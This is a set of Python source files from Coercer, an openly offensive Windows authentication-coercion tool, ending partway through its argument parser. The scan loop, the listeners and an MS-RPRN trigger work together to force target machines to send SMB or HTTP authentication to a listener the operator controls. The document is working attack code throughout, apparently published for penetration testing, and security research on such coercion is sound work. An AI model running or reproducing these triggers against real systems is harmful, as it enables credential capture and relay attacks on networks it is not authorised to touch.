#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : TestResults.py
# Author             : Podalirius (@podalirius_)
# Date created       : 19 Sep 2022

from enum import Enum


class TestResult(Enum):
    """
    Enum class TestResult
    """
    NO_AUTH_RECEIVED   = 0x0
    SMB_AUTH_RECEIVED  = 0x1
    HTTP_AUTH_RECEIVED = 0x2

    NCA_S_UNK_IF = 0x10001

    ERROR_BAD_NETPATH = 0x35
    ERROR_INVALID_NAME = 0x7b

    RPC_X_BAD_STUB_DATA = 0x20001
    RPC_S_ACCESS_DENIED = 0x5
    RPC_S_INVALID_BINDING = 0x6a6
    RPC_S_INVALID_NET_ADDR = 0x6ab

    SMB_STATUS_PIPE_DISCONNECTED = 0x30001




#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : scan.py
# Author             : Podalirius (@podalirius_)
# Date created       : 18 Sep 2022


import time
from coercer.core.MethodFilter import MethodFilter
from coercer.core.utils import generate_exploit_path_from_template
from coercer.network.DCERPCSession import DCERPCSession
from coercer.structures.TestResult import TestResult
from coercer.network.authentications import trigger_and_catch_authentication
from coercer.network.smb import can_connect_to_pipe, can_bind_to_interface
from coercer.network.utils import get_ip_addr_to_listen_on, get_next_http_listener_port


def action_scan(target, available_methods, options, credentials, reporter):
    http_listen_port = 0

    method_filter = MethodFilter(
        filter_method_name=options.filter_method_name,
        filter_protocol_name=options.filter_protocol_name
    )

    # Preparing tasks ==============================================================================================================

    tasks = {}
    for method_type in available_methods.keys():
        for category in sorted(available_methods[method_type].keys()):
            for method in sorted(available_methods[method_type][category].keys()):
                instance = available_methods[method_type][category][method]["class"]

                if method_filter.matches_filter(instance):
                    for access_type, access_methods in instance.access.items():
                        if access_type not in tasks.keys():
                            tasks[access_type] = {}

                        # Access through SMB named pipe
                        if access_type == "ncan_np":
                            for access_method in access_methods:
                                namedpipe, uuid, version = access_method["namedpipe"], access_method["uuid"], access_method["version"]
                                if namedpipe not in tasks[access_type].keys():
                                    tasks[access_type][namedpipe] = {}

                                if uuid not in tasks[access_type][namedpipe].keys():
                                    tasks[access_type][namedpipe][uuid] = {}

                                if version not in tasks[access_type][namedpipe][uuid].keys():
                                    tasks[access_type][namedpipe][uuid][version] = []

                                if instance not in tasks[access_type][namedpipe][uuid][version]:
                                    tasks[access_type][namedpipe][uuid][version].append(instance)

    # Executing tasks =======================================================================================================================

    listening_ip = get_ip_addr_to_listen_on(target, options)
    if options.verbose:
        print("[+] Listening for authentications on '%s', SMB port %d" % (listening_ip, options.smb_port))

    # Processing ncan_np tasks
    ncan_np_tasks = tasks["ncan_np"]
    for namedpipe in sorted(ncan_np_tasks.keys()):
        if can_connect_to_pipe(target, namedpipe, credentials):
            print("[+] SMB named pipe '\x1b[1;94m%s\x1b[0m' is \x1b[1;92maccessible\x1b[0m!" % namedpipe)
            for uuid in sorted(ncan_np_tasks[namedpipe].keys()):
                for version in sorted(ncan_np_tasks[namedpipe][uuid].keys()):
                    if can_bind_to_interface(target, namedpipe, credentials, uuid, version):
                        print("   [+] Successful bind to interface (%s, %s)!" % (uuid, version))
                        for msprotocol_class in sorted(ncan_np_tasks[namedpipe][uuid][version], key=lambda x:x.function["name"]):

                            exploit_paths = msprotocol_class.generate_exploit_templates(desired_auth_type=options.auth_type)

                            stop_exploiting_this_function = False
                            for listener_type, exploitpath in exploit_paths:
                                if stop_exploiting_this_function == True:
                                    # Got a nca_s_unk_if response, this function does not listen on the given interface
                                    continue
                                if listener_type == "http":
                                    http_listen_port = get_next_http_listener_port(current_value=http_listen_port, listen_ip=listening_ip, options=options)
                                exploitpath = generate_exploit_path_from_template(
                                    template=exploitpath,
                                    listener=listening_ip,
                                    http_listen_port=options.http_port,
                                    smb_listen_port=options.smb_port
                                )

                                msprotocol_rpc_instance = msprotocol_class(path=exploitpath)
                                dcerpc = DCERPCSession(credentials=credentials, verbose=True)
                                dcerpc.connect_ncacn_np(target=target, pipe=namedpipe)

                                if dcerpc.session is not None:
                                    dcerpc.bind(interface_uuid=uuid, interface_version=version)
                                    if dcerpc.session is not None:
                                        reporter.print_testing(msprotocol_rpc_instance)

                                        result = trigger_and_catch_authentication(
                                            options=options,
                                            dcerpc_session=dcerpc.session,
                                            target=target,
                                            method_trigger_function=msprotocol_rpc_instance.trigger,
                                            listenertype=listener_type,
                                            listen_ip=listening_ip,
                                            http_port=http_listen_port
                                        )

                                        reporter.report_test_result(
                                            uuid=uuid, version=version, namedpipe=namedpipe,
                                            msprotocol_rpc_instance=msprotocol_rpc_instance,
                                            result=result,
                                            exploitpath=exploitpath
                                        )

                                        if result == TestResult.NCA_S_UNK_IF:
                                            stop_exploiting_this_function = True

                                if options.delay is not None:
                                    # Sleep between attempts
                                    time.sleep(options.delay)
                    else:
                        if options.verbose:
                            print("   [!] Cannot bind to interface (%s, %s)!" % (uuid, version))
        else:
            if options.verbose:
                print("[!] SMB named pipe '\x1b[1;94m%s\x1b[0m' is \x1b[1;91mnot accessible\x1b[0m!" % namedpipe)




#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : Listener.py
# Author             : Podalirius (@podalirius_)
# Date created       : 15 Sep 2022

import socket
import time
from coercer.structures.TestResult import TestResult


class Listener(object):
    """
    class Listener
    """

    def __init__(self, options, listen_ip=None, timeout=None):
        super(Listener, self).__init__()

        self.options = options

        if self.options.mode in ["fuzz", "scan"]:
            self.smb_port = self.options.smb_port
        elif self.options.mode in ["coerce"]:
            self.smb_port = self.options.smb_port

        self.timeout = 1
        self.listen_ip = "0.0.0.0"

        if listen_ip is not None:
            self.listen_ip = listen_ip

        if timeout is not None:
            self.timeout = timeout

    def start_smb(self, control_structure):
        """
        Function start_smb(self, control_structure)
        """
        start_time = int(time.time())
        stop_time = start_time + self.timeout
        while (int(time.time()) < stop_time) and control_structure["result"] == TestResult.NO_AUTH_RECEIVED:
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(1)
                s.bind((self.listen_ip, self.smb_port))
                s.listen(5)
                conn, address = s.accept()
                data = conn.recv(2048)
                # Win11 2208:  b'\x00\x00\x00E\xffSMBr\x00\x00\x00\x00\x18S\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x00\x00\x00\x00"\x00\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00'
                # WinServ2016: b'\x00\x00\x00\x9b\xffSMBr\x00'
                # b'\x00\x00\x00\xfc\xfeSMB@\x00\x01\x00\x00\x00\x00\x00\x00\x00!\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x05\x00\x02\x00\x00\x00\x7f\x00\x00\x00\x12\xe3\x9f\x90\xfa7\xed\x11\x98.\xe8\xd8\xd1\xf3/\xf9p\x00\x00\x00\x05\x00\x00\x00\x02\x02\x10\x02\x00\x03\x02\x03\x11\x03\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\xec-\xd9\x94\xf2{D\x91\xd54\xb48KW\xbe\x81uM&\xbd.q\xff\xc3\xcb\x90\x87\x11\x1c\xbd9\xd8\x00\x00\x02\x00\x06\x00\x00\x00\x00\x00\x02\x00\x02\x00\x01\x00\x00\x00\x03\x00\x10\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x04\x00\x02\x00\x03\x00\x01\x00\x05\x00\x1a\x00\x00\x00\x00\x00F\x00R\x00T\x00L\x00S\x00E\x00Q\x00P\x00R\x00N\x00P\x000\x001\x00\x00\x00\x00\x00\x00\x00\x06
                if data.startswith(b'\x00\x00\x00') and b'SMB' in data:
                    # TODO: Handle SMB handshake better than this.
                    control_structure["result"] = TestResult.SMB_AUTH_RECEIVED
                else:
                    print("\n", data)
            except Exception as e:
                pass

    def start_http(self, control_structure, http_port=80):
        """
        Function start_http(self, control_structure, http_port=80)
        """
        start_time = int(time.time())
        stop_time = start_time + self.timeout
        while (int(time.time()) < stop_time) and control_structure["result"] == TestResult.NO_AUTH_RECEIVED:
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(1)
                if self.options.mode in ["fuzz", "scan"]:
                    s.bind((self.listen_ip, http_port))
                elif self.options.mode in ["coerce"]:
                    s.bind((self.listen_ip, self.options.http_port))
                s.listen(5)
                conn, address = s.accept()
                data = conn.recv(2048)
                print("\n",data,"\n")
                if b'HTTP' in data:
                    control_structure["result"] = TestResult.HTTP_AUTH_RECEIVED
            except Exception as e:
                pass




#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : utils.py
# Author             : Podalirius (@podalirius_)
# Date created       : 17 Sep 2022

import socket
import fcntl
import struct


def get_ip_address_of_interface(ifname):
    """
    Function get_ip_address_of_interface(ifname)
    """
    if type(ifname) == str:
        ifname = bytes(ifname, "utf-8")
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    SIOCGIFADDR = 0x8915
    try:
        ifname = struct.pack('256s', ifname[:15])
        a = fcntl.ioctl(s.fileno(), SIOCGIFADDR, ifname)[20:24]
        return socket.inet_ntoa(a)
    except OSError as e:
        return None


def get_ip_address_to_target_remote_host(host, port):
    """
    Function get_ip_address_to_target_remote_host(host, port)
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect((host, port))
        return s.getsockname()[0]
    except Exception as e:
        return None


def can_listen_on_port(listen_ip, port):
    """
    Function can_listen_on_port(listen_ip, port)
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(0.05)
        s.bind((listen_ip, port))
        s.listen(5)
        s.close()
        return True
    except OSError as e:
        return False


def get_ip_addr_to_listen_on(target, options):
    """
    Function get_ip_addr_to_listen_on(target, options)
    """
    # Getting IP address to listen on
    listening_ip = None
    if options.ip_address is not None:
        listening_ip = options.ip_address
    elif options.interface is not None:
        listening_ip = get_ip_address_of_interface(options.interface)
        if listening_ip is None:
            print("[!] Could not get IP address of interface '%s'" % options.interface)
    else:
        # Getting ip address of interface that can access remote target
        possible_ports, k = [445, 139, 88], 0
        while listening_ip is None and k < len(possible_ports):
            listening_ip = get_ip_address_to_target_remote_host(target, possible_ports[k])
            k += 1
        if listening_ip is None:
            print("[!] Could not detect interface with a route to target machine '%s'" % target)
    return listening_ip


def get_next_http_listener_port(current_value, listen_ip, options):
    """
    Function get_next_http_listener_port(current_value, listen_ip, options)
    """
    port_window = (options.max_http_port - options.min_http_port)

    if current_value > options.max_http_port:
        current_value = options.max_http_port

    if current_value < options.min_http_port:
        current_value = options.min_http_port

    current_value = options.min_http_port + ((current_value + 1) % port_window)
    while not can_listen_on_port(listen_ip, current_value):
        current_value = options.min_http_port + ((current_value + 1) % port_window)

    return current_value



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : loader.py
# Author             : Podalirius (@podalirius_)
# Date created       : 18 Sep 2022


import os
import sys
from importlib import import_module
from coercer.structures.MethodType import MethodType


def find_and_load_coerce_methods(debug=False):
    """
    Function find_and_load_coerce_methods()

    Parameters:
        bool:debug Enable or disable debug output

    Returns:
        list:coerce_methods
    """
    coerce_methods = {}
    search_dir = os.path.dirname(__file__) + os.path.sep + ".." + os.path.sep + "methods"
    if debug:
        print("[loader] Loading coerce methods from %s ..." % search_dir)
    sys.path.extend([search_dir])
    for _dir in os.listdir(search_dir):
        _dirpath = search_dir + os.path.sep + _dir
        if os.path.isdir(_dirpath) and _dir not in ["__pycache__"]:
            if debug:
                print("[loader] Loading methods for category %s ..." % _dir)
            for _file in os.listdir(_dirpath):
                _filepath = _dirpath + os.path.sep + _file
                if _file.endswith('.py'):
                    if os.path.isfile(_filepath) and _file not in ["__init__.py"]:
                        try:
                            module = import_module('coercer.methods.%s.%s' % (_dir, _file[:-3]))
                            method_class = module.__getattribute__(_file[:-3])
                            if all([kw in dir(method_class) for kw in ["method_type"]]):
                                if method_class.method_type not in coerce_methods.keys():
                                    coerce_methods[method_class.method_type] = {}
                                # Handling Microsoft Network protocols methods
                                if method_class.method_type == MethodType.MICROSOFT_PROTOCOL:
                                    if method_class.protocol["shortname"] not in coerce_methods[method_class.method_type].keys():
                                        coerce_methods[method_class.method_type][method_class.protocol["shortname"]] = {}
                                    if method_class.function["name"] not in coerce_methods[method_class.method_type][method_class.protocol["shortname"]].keys():
                                        coerce_methods[method_class.method_type][method_class.protocol["shortname"]][method_class.function["name"]] = {
                                            "class": method_class
                                        }
                                    if debug:
                                        print("[loader]   └──> Loaded Remote Procedure Call %s (opnum %d)" % (method_class.function["name"], method_class.function["opnum"]))
                                # Handling other methods
                                elif method_class.method_type == MethodType.OTHER:
                                    pass
                            else:
                                if debug:
                                    print("[loader] '%s' does not match the template." % _file)
                        except AttributeError as e:
                            pass
    if debug:
        print("[loader] coerce_methods:", coerce_methods)
    return coerce_methods



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : RpcRemoteFindFirstPrinterChangeNotification.py
# Author             : Podalirius (@podalirius_)
# Date created       : 15 Sep 2022

from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5 import rprn
from impacket.dcerpc.v5.dtypes import NULL


class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83)

    Method found by:
     -
    """

    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\spoolss",
                "uuid": "12345678-1234-abcd-ef00-0123456789ab",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-RPRN]: Print System Remote Protocol",
        "shortname": "MS-RPRN"
    }

    function = {
        "name": "RpcRemoteFindFirstPrinterChangeNotification",
        "opnum": 62,
        "vulnerable_arguments": ["pszLocalMachine"]
    }

    def trigger(self, dcerpc_session, target):
        if dcerpc_session is not None:
            try:
                resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
                request = rprn.RpcRemoteFindFirstPrinterChangeNotification()
                request['hPrinter'] = resp['pHandle']
                request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
                # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77
                request['fdwOptions'] = 0x00000000
                request['pszLocalMachine'] = self.path
                request['dwPrinterLocal'] = 0
                request['cbBuffer'] = NULL
                request['pBuffer'] = NULL
                resp = dcerpc_session.request(request)
                return ""
            except Exception as err:
                return err
        else:
            print("[!] Error: dce is None, you must call connect() first.")
            return None



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : MethodTypes.py
# Author             : Podalirius (@podalirius_)
# Date created       : 15 Sep 2022

from enum import Enum


class MethodType(Enum):
    """
    Enum class MethodType
    """

    MICROSOFT_PROTOCOL = 0x01

    OTHER = 0xff





#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : smb.py
# Author             : Podalirius (@podalirius_)
# Date created       : 17 Sep 2022


import sys
from impacket.dcerpc.v5 import transport
from impacket.uuid import uuidtup_to_bin
from impacket.smbconnection import SMBConnection, SMB2_DIALECT_002, SMB2_DIALECT_21, SMB_DIALECT, SessionError


def init_smb_session(args, domain, username, password, address, lmhash, nthash, verbose=False):
    smbClient = SMBConnection(address, args.target_ip, sess_port=int(args.port))
    dialect = smbClient.getDialect()
    if dialect == SMB_DIALECT:
        if verbose:
            print("[debug] SMBv1 dialect used")
    elif dialect == SMB2_DIALECT_002:
        if verbose:
            print("[debug] SMBv2.0 dialect used")
    elif dialect == SMB2_DIALECT_21:
        if verbose:
            print("[debug] SMBv2.1 dialect used")
    else:
        if verbose:
            print("[debug] SMBv3.0 dialect used")
    if args.k is True:
        smbClient.kerberosLogin(username, password, domain, lmhash, nthash, args.aesKey, args.dc_ip)
    else:
        smbClient.login(username, password, domain, lmhash, nthash)
    if smbClient.isGuestSession() > 0:
        if verbose:
            print("[debug] GUEST Session Granted")
    else:
        if verbose:
            print("[debug] USER Session Granted")
    return smbClient


def try_login(credentials, target, port=445, verbose=False):
    """Documentation for try_login"""
    # Checking credentials if any
    if not credentials.is_anonymous():
        try:
            smbClient = SMBConnection(
                remoteName=target,
                remoteHost=target,
                sess_port=int(port)
            )
            smbClient.login(
                user=credentials.username,
                password=credentials.password,
                domain=credentials.domain,
                lmhash=credentials.lmhash,
                nthash=credentials.nthash
            )
        except Exception as e:
            print("[!] Could not login as '%s' with these credentials on '%s'." % (credentials.username, target))
            print("  | Error: %s" % str(e))
            return False
        else:
            return True
    else:
        return True


def list_remote_pipes(target, credentials, share='IPC$', maxdepth=-1, debug=False):
    """
    Function list_remote_pipes(target, credentials, share='IPC$', maxdepth=-1, debug=False)
    """
    pipes = []
    try:
        smbClient = SMBConnection(target, target, sess_port=int(445))
        dialect = smbClient.getDialect()
        if credentials.doKerberos is True:
            smbClient.kerberosLogin(credentials.username, credentials.password, credentials.domain, credentials.lmhash, credentials.nthash, credentials.aesKey, credentials.dc_ip)
        else:
            smbClient.login(credentials.username, credentials.password, credentials.domain, credentials.lmhash, credentials.nthash)
        if smbClient.isGuestSession() > 0:
            if debug:
                print("[>] GUEST Session Granted")
        else:
            if debug:
                print("[>] USER Session Granted")
    except Exception as e:
        if debug:
            print(e)
        return pipes

    # Breadth-first search algorithm to recursively find .extension files
    searchdirs = [""]
    depth = 0
    while len(searchdirs) != 0 and ((depth <= maxdepth) or (maxdepth == -1)):
        depth += 1
        next_dirs = []
        for sdir in searchdirs:
            if debug:
                print("[>] Searching in %s " % sdir)
            try:
                for sharedfile in smbClient.listPath(share, sdir + "*", password=None):
                    if sharedfile.get_longname() not in [".", ".."]:
                        if sharedfile.is_directory():
                            if debug:
                                print("[>] Found directory %s/" % sharedfile.get_longname())
                            next_dirs.append(sdir + sharedfile.get_longname() + "/")
                        else:
                            if debug:
                                print("[>] Found file %s" % sharedfile.get_longname())
                            full_path = sdir + sharedfile.get_longname()
                            pipes.append(full_path)
            except SessionError as e:
                if debug:
                    print("[error] %s " % e)
        searchdirs = next_dirs
        if debug:
            print("[>] Next iteration with %d folders." % len(next_dirs))
    pipes = sorted(list(set(["\\PIPE\\" + f for f in pipes])), key=lambda x:x.lower())
    return pipes



def can_connect_to_pipe(target, pipe, credentials, targetIp=None, verbose=False):
    """
    Function can_connect_to_pipe(target, pipe, credentials, targetIp=None, verbose=False)
    """
    ncan_target = r'ncacn_np:%s[%s]' % (target, pipe)
    __rpctransport = transport.DCERPCTransportFactory(ncan_target)

    if hasattr(__rpctransport, 'set_credentials'):
        __rpctransport.set_credentials(
            username=credentials.username,
            password=credentials.password,
            domain=credentials.domain,
            lmhash=credentials.lmhash,
            nthash=credentials.nthash
        )

    if credentials.doKerberos:
        __rpctransport.set_kerberos(credentials.doKerberos, kdcHost=credentials.kdcHost)
    if targetIp is not None:
        __rpctransport.setRemoteHost(targetIp)

    dce = __rpctransport.get_dce_rpc()
    # dce.set_auth_type(RPC_C_AUTHN_WINNT)
    # dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)

    if verbose:
        print("         [>] Connecting to %s ... " % ncan_target, end="")
    sys.stdout.flush()
    try:
        dce.connect()
    except Exception as e:
        if verbose:
            print("\x1b[1;91mfail\x1b[0m")
            print("      [!] Something went wrong, check error status => %s" % str(e))
        return None
    else:
        if verbose:
            print("\x1b[1;92msuccess\x1b[0m")
        return dce


def can_bind_to_interface(target, pipe, credentials, uuid, version, targetIp=None, verbose=False):
    """
    Function can_bind_to_interface(target, pipe, credentials, uuid, version, targetIp=None, verbose=False)
    """
    ncan_target = r'ncacn_np:%s[%s]' % (target, pipe)
    __rpctransport = transport.DCERPCTransportFactory(ncan_target)

    if hasattr(__rpctransport, 'set_credentials'):
        __rpctransport.set_credentials(
            username=credentials.username,
            password=credentials.password,
            domain=credentials.domain,
            lmhash=credentials.lmhash,
            nthash=credentials.nthash
        )

    if credentials.doKerberos:
        __rpctransport.set_kerberos(credentials.doKerberos, kdcHost=credentials.kdcHost)
    if targetIp is not None:
        __rpctransport.setRemoteHost(targetIp)

    dce = __rpctransport.get_dce_rpc()
    # dce.set_auth_type(RPC_C_AUTHN_WINNT)
    # dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)

    if verbose:
        print("         [>] Connecting to %s ... " % ncan_target, end="")
    sys.stdout.flush()
    try:
        dce.connect()
    except Exception as e:
        if verbose:
            print("\x1b[1;91mfail\x1b[0m")
            print("      [!] Something went wrong, check error status => %s" % str(e))
        return False

    if verbose:
        print("         [>] Binding to <uuid='%s', version='%s'> ... " % (uuid, version), end="")
    sys.stdout.flush()
    try:
        dce.bind(uuidtup_to_bin((uuid, version)))
    except Exception as e:
        if verbose:
            print("\x1b[1;91mfail\x1b[0m")
            print("         [!] Something went wrong, check error status => %s" % str(e))
        if "STATUS_PIPE_DISCONNECTED" in str(e):
            # SMB SessionError: STATUS_PIPE_DISCONNECTED()
            return False
        elif "STATUS_OBJECT_NAME_NOT_FOUND" in str(e):
            # SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
            return False
        elif "STATUS_ACCESS_DENIED" in str(e):
            # SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
            return False
        elif "abstract_syntax_not_supported" in str(e):
            # Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint)
            return False
        elif "Unknown DCE RPC packet type received" in str(e):
            # Unknown DCE RPC packet type received: 11
            return False
        elif "Authentication type not recognized" in str(e):
            # DCERPC Runtime Error: code: 0x8 - Authentication type not recognized
            return False
        else:
            return True
    else:
        if verbose:
            print("\x1b[1;92msuccess\x1b[0m")
        return True



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : Credentials.py
# Author             : Podalirius (@podalirius_)
# Date created       : 16 Sep 2022

class Credentials(object):
    """
    Documentation for class Credentials
    """

    def __init__(self, username, password, domain, lmhash, nthash, doKerberos=False, kdcHost=None):
        super(Credentials, self).__init__()
        self.username = username
        self.password = password
        self.domain = domain
        self.lmhash = lmhash
        self.nthash = nthash
        self.doKerberos = doKerberos
        self.kdcHost = kdcHost

    def is_anonymous(self):
        """
        Function is_anonymous()
        Returns True if anonymous authentication is used False otherwise

        Returns:
        bool:anonymous
        """
        anonymous = False
        if self.username is None:
            anonymous = True
        elif len(self.username) == 0:
            anonymous = True
        else:
            anonymous = False
        return anonymous



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : ReportingLevel.py
# Author             : Podalirius (@podalirius_)
# Date created       : 19 Sep 2022

from enum import Enum


class ReportingLevel(Enum):
    """
    Enum class ReportingLevel
    """

    INFO = 1

    VERBOSE = 2

    DEBUg = 0xff


#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : __main__.py
# Author             : Podalirius (@podalirius_)
# Date created       : 17 Sep 2022


import argparse
import os
import sys

from coercer.core.Reporter import Reporter
from coercer.structures.Credentials import Credentials
from coercer.core.modes.scan import action_scan
from coercer.core.modes.coerce import action_coerce
from coercer.core.modes.fuzz import action_fuzz
from coercer.core.loader import find_and_load_coerce_methods
from coercer.network.smb import try_login


VERSION = "2.2-blackhat-edition"

banner = """       ______
      / ____/___  ___  _____________  _____
     / /   / __ \\/ _ \\/ ___/ ___/ _ \\/ ___/
    / /___/ /_/ /  __/ /  / /__/  __/ /      v%s
    \\____/\\____/\\___/_/   \\___/\\___/_/       by @podalirius_
""" % VERSION


def parseArgs():
    print(banner)
    parser = argparse.ArgumentParser(add_help=True, description="Automatic windows authentication coercer using various methods.")
    parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode (default: False)")

    # Creating the "scan" subparser ==============================================================================================================
    mode_scan = argparse.ArgumentParser(add_help=False)
    mode_scan.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode (default: False)")
    # Advanced configuration
    mode_scan_advanced_config = mode_scan.add_argument_group("Advanced options")
    mode_scan_advanced_config.add_argument("--export-json", default=None, type=str, help="Export results to specified JSON file.")
    mode_scan_advanced_config.add_argument("--export-xlsx", default=None, type=str, help="Export results to specified XLSX file.")
    mode_scan_advanced_config.add_argument("--export-sqlite", default=None, type=str, help="Export results to specified SQLITE3 database file.")
    mode_scan_advanced_config.add_argument("--delay", default=None, type=int, help="Delay between attempts (in seconds)")
    mode_scan_advanced_config.add_argument("--min-http-port", default=64000, type=int, help="Verbose mode (default: False)")
    mode_scan_advanced_config.add_argument("--max-http-port", default=65000, type=int, help="Verbose mode (default: False)")
    mode_scan_advanced_config.add_argument("--http-port", default=80, type=int, help="HTTP port (default: 80)")
    mode_scan_advanced_config.add_argument("--smb-port", default=445, type=int, help="SMB port (default: 445)")
    mode_scan_advanced_config.add_argument("--auth-type", default=None, type=str, help="Desired authentication type ('smb' or 'http').")
    # Filters
    mode_scan_filters = mode_scan.add_argument_group("Filtering methods")
    mode_scan_filters.add_argument("--filter-method-name", default=None, type=str, help="")
    mode_scan_filters.add_argument("--filter-protocol-name", default=None, type=str, help="")
    # Credentials
    mode_scan_credentials = mode_scan.add_argument_group("Credentials")
    mode_scan_credentials.add_argument("-u", "--username", default="", help="Username to authenticate to the remote machine.")
    mode_scan_credentials.add_argument("-p", "--password", default="", help="Password to authenticate to the remote machine. (if omitted, it will be asked unless -no-pass is specified)")
    mode_scan_credentials.add_argument("-d", "--domain", default="", help="Windows domain name to authenticate to the machine.")
    mode_scan_credentials.add_argument("--hashes", action="store", metavar="[LMHASH]:NTHASH", help="NT/LM hashes (LM hash can be empty)")
    mode_scan_credentials.add_argument("--no-pass", action="store_true", help="Don't ask for password (useful for -k)")
    mode_scan_credentials.add_argument("--dc-ip", action="store", metavar="ip address", help="IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter")
    # Targets source
    mode_scan_targets_source = mode_scan.add_mutually_exclusive_group(required=True)
    mode_scan_targets_source.add_argument("-t", "--target-ip", default=None, help="IP address or hostname of the target machine")
    mode_scan_targets_source.add_argument("-f", "--targets-file", default=None, help="File containing a list of IP address or hostname of the target machines")
    # Listener
    mode_scan_targets_listener = mode_scan.add_mutually_exclusive_group(required=False)
    mode_scan_targets_listener.add_argument("-i", "--interface", default=None, help="Interface to listen on incoming authentications.")
    mode_scan_targets_listener.add_argument("-I", "--ip-address", default=None, help="IP address to listen on incoming authentications.")

    # Creating the "fuzz" subparser ==============================================================================================================
    mode_fuzz = argparse.ArgumentParser(add_help=False)
    mode_fuzz.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode (default: False)")
    # Advanced configuration
    mode_fuzz_advanced_config = mode_fuzz.add_argument_group("Advanced configuration")
    mode_fuzz_advanced_config.add_argument("--export-json", default=None, type=str, help="Export results to specified JSON file.")
    mode_fuzz_advanced_config.add_argument("--export-xlsx", default=None, type=str, help="Export results to specified XLSX file.")
    mode_fuzz_advanced_config.add_argument("--export-sqlite", default=None, type=str, help="Export results to specified SQLITE3 database file.")
    mode_fuzz_advanced_config.add_argument("--delay", default=None, type=int, help="Delay between attempts (in seconds)")
    mode_fuzz_advanced_config.add_argument("--min-http-port", default=64000, type=int, help="Verbose mode (default: False)")
    mode_fuzz_advanced_config.add_argument("--max-http-port", default=65000, type=int, help="Verbose mode (default: False)")
    mode_fuzz_advanced_config.add_argument("--smb-port", default=445, type=int, help="SMB port (default: 445)")
    mode_fuzz_advanced_config.add_argument("--auth-type", default=None, type=str, help="Desired authentication type ('smb' or 'http').")
    # Filters
    mode_fuzz_filters = mode_fuzz.add_argument_group("Filtering methods")
    mode_fuzz_filters.add_argument("--filter-method-name", default=None, type=str, help="")
    mode_fuzz_filters.add_argument("--filter-protocol-name", default=None, type=str, help="")
    # Credentials
    mode_fuzz_credentials = mode_fuzz.add_argument_group("Credentials")
    mode_fuzz_credentials.add_argument("--only-known-exploit-paths", action="store_true", default=False, help="Only test known exploit paths for each functions")
    mode_fuzz_credentials.add_argument("-u", "--username", default="", help="Username to authenticate to the remote machine.")
    mode_fuzz_credentials.add_argument("-p", "--password", default="", help="Password to authenticate to the remote machine. (if omitted, it will be asked unless -no-pass is specified)")
    mode_fuzz_credentials.add_argument("-d", "--domain", default="", help="Windows domain name to authenticate to the machine.")
    mode_fuzz_credentials.add_argument("--hashes", action="store", metavar="[LMHASH]:NTHASH", help="NT/LM hashes (LM hash can be empty)")
    mode_fuzz_credentials.add_argument("--no-pass", action="store_true", help="Don't ask for password (useful for -k)")
    mode_fuzz_credentials.add_argument("--dc-ip", action="store", metavar="ip address", help="IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter")
    # Targets source
    mode_fuzz_targets_source = mode_fuzz.add_mutually_exclusive_group(required=True)
    mode_fuzz_targets_source.add_argument("-t", "--target-ip", default=None, help="IP address or hostname of the target machine")
    mode_fuzz_targets_source.add_argument("-f", "--targets-file", default=None, help="File containing a list of IP address or hostname of the target machines")
    # Listener
    mode_fuzz_targets_listener = mode_fuzz.add_mutually_exclusive_group(required=False)
    mode_fuzz_targets_listener.add_argument("-i", "--interface", default=None, help="Interface to listen on incoming authentications.")
    mode_fuzz_targets_listener.add_argument("-I", "--ip-address", default=None, help="IP address to listen on incoming authentications.")

